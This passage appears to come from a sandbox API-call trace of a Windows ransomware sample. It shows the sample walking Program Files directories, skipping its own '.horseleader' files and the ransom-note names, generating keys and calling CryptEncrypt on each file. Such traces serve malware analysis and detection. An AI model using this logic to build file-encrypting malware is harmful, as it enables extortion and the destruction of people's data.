p1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.794] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.795] CloseHandle (hObject=0x158) returned 1 [0251.795] GetProcessHeap () returned 0x780000 [0251.795] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.795] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e91e8b0, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6e91e8b0, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4f204eff, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="scene_button_style_default_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0251.795] lstrcmpiW (lpString1="scene_button_style_default_Thumbnail.bmp", lpString2="Windows") returned -1 [0251.795] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\scene_button_style_default_Thumbnail.bmp") returned 88 [0251.795] StrStrIW (lpFirst="scene_button_style_default_Thumbnail.bmp", lpSrch=".horseleader") returned 0x0 [0251.795] lstrcmpW (lpString1="scene_button_style_default_Thumbnail.bmp", lpString2="#Decrypt#.txt") returned 1 [0251.795] lstrcmpW (lpString1="scene_button_style_default_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0251.795] lstrlenW (lpString=".testttjffg") returned 11 [0251.795] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\scene_button_style_default_Thumbnail.bmp", lpSrch=".testttjffg") returned 0x0 [0251.796] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.796] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.796] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\scene_button_style_default_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\scene_button_style_default_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.796] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e8d25f6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6e8d25f6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4f204eff, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xd86, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="shadowonlyframe_buttongraphic.png", cAlternateFileName="")) returned 1 [0251.796] lstrcmpiW (lpString1="shadowonlyframe_buttongraphic.png", lpString2="Windows") returned -1 [0251.796] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_buttongraphic.png") returned 81 [0251.796] StrStrIW (lpFirst="shadowonlyframe_buttongraphic.png", lpSrch=".horseleader") returned 0x0 [0251.796] lstrcmpW (lpString1="shadowonlyframe_buttongraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.796] lstrcmpW (lpString1="shadowonlyframe_buttongraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.796] lstrlenW (lpString=".testttjffg") returned 11 [0251.796] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_buttongraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.796] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.796] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.796] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shadowonlyframe_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.797] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e8f8753, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6e8f8753, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4f204eff, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xd3e, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="shadowonlyframe_selectionsubpicture.png", cAlternateFileName="")) returned 1 [0251.797] lstrcmpiW (lpString1="shadowonlyframe_selectionsubpicture.png", lpString2="Windows") returned -1 [0251.797] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_selectionsubpicture.png") returned 87 [0251.797] StrStrIW (lpFirst="shadowonlyframe_selectionsubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.797] lstrcmpW (lpString1="shadowonlyframe_selectionsubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.797] lstrcmpW (lpString1="shadowonlyframe_selectionsubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.797] lstrlenW (lpString=".testttjffg") returned 11 [0251.797] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_selectionsubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.797] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.797] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.797] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_selectionsubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shadowonlyframe_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.797] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e8ac499, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6e8ac499, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4f204eff, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc8e, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="shadowonlyframe_videoinset.png", cAlternateFileName="")) returned 1 [0251.797] lstrcmpiW (lpString1="shadowonlyframe_videoinset.png", lpString2="Windows") returned -1 [0251.797] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_videoinset.png") returned 78 [0251.797] StrStrIW (lpFirst="shadowonlyframe_videoinset.png", lpSrch=".horseleader") returned 0x0 [0251.797] lstrcmpW (lpString1="shadowonlyframe_videoinset.png", lpString2="#Decrypt#.txt") returned 1 [0251.797] lstrcmpW (lpString1="shadowonlyframe_videoinset.png", lpString2="_uninstalling_.png") returned 1 [0251.797] lstrlenW (lpString=".testttjffg") returned 11 [0251.797] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_videoinset.png", lpSrch=".testttjffg") returned 0x0 [0251.798] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.798] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.798] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_videoinset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shadowonlyframe_videoinset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.798] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f4d7984, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa9057bb, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f4fdbf3, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Shatter", cAlternateFileName="")) returned 1 [0251.798] lstrcmpiW (lpString1="Shatter", lpString2="Windows") returned -1 [0251.798] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter") returned 55 [0251.798] lstrcmpW (lpString1="Shatter", lpString2=".") returned 1 [0251.798] lstrcmpW (lpString1="Shatter", lpString2="..") returned 1 [0251.798] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.798] GetProcessHeap () returned 0x780000 [0251.798] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.798] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\*") returned 57 [0251.798] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f4d7984, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa9057bb, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f4fdbf3, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.810] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.811] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\.") returned 57 [0251.811] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.811] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f4d7984, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa9057bb, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f4fdbf3, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.811] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.811] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\..") returned 58 [0251.811] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.811] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.811] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ff23274, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ff23274, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4f204eff, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0251.811] lstrcmpiW (lpString1="1047x576black.png", lpString2="Windows") returned -1 [0251.811] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\1047x576black.png") returned 73 [0251.811] StrStrIW (lpFirst="1047x576black.png", lpSrch=".horseleader") returned 0x0 [0251.811] lstrcmpW (lpString1="1047x576black.png", lpString2="#Decrypt#.txt") returned 1 [0251.811] lstrcmpW (lpString1="1047x576black.png", lpString2="_uninstalling_.png") returned 1 [0251.811] lstrlenW (lpString=".testttjffg") returned 11 [0251.811] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\1047x576black.png", lpSrch=".testttjffg") returned 0x0 [0251.811] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.811] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.811] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.812] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ff493d1, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ff493d1, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4f29d477, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb04, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="203x8subpicture.png", cAlternateFileName="")) returned 1 [0251.812] lstrcmpiW (lpString1="203x8subpicture.png", lpString2="Windows") returned -1 [0251.812] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\203x8subpicture.png") returned 75 [0251.812] StrStrIW (lpFirst="203x8subpicture.png", lpSrch=".horseleader") returned 0x0 [0251.812] lstrcmpW (lpString1="203x8subpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.812] lstrcmpW (lpString1="203x8subpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.812] lstrlenW (lpString=".testttjffg") returned 11 [0251.812] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\203x8subpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.812] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.812] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.812] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\203x8subpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.812] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70007aa2, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70007aa2, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4f92909f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.812] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.812] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_ButtonGraphic.png") returned 88 [0251.812] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.812] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.813] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.813] lstrlenW (lpString=".testttjffg") returned 11 [0251.813] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.813] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.813] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.813] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.813] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ffe1945, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ffe1945, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fa59b8f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.813] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.813] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_SelectionSubpicture.png") returned 94 [0251.813] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.813] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.813] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.813] lstrlenW (lpString=".testttjffg") returned 11 [0251.813] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.813] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.813] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.813] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.814] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70007aa2, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70007aa2, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fa59b8f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.814] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.814] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_ButtonGraphic.png") returned 89 [0251.814] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.814] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.814] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.814] lstrlenW (lpString=".testttjffg") returned 11 [0251.814] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.814] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.814] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.814] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.814] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ff9568b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ff9568b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4faf2107, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.814] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.814] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_SelectionSubpicture.png") returned 95 [0251.814] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.814] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.814] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.814] lstrlenW (lpString=".testttjffg") returned 11 [0251.814] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.815] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.815] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.815] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.815] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ff6f52e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ff6f52e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, 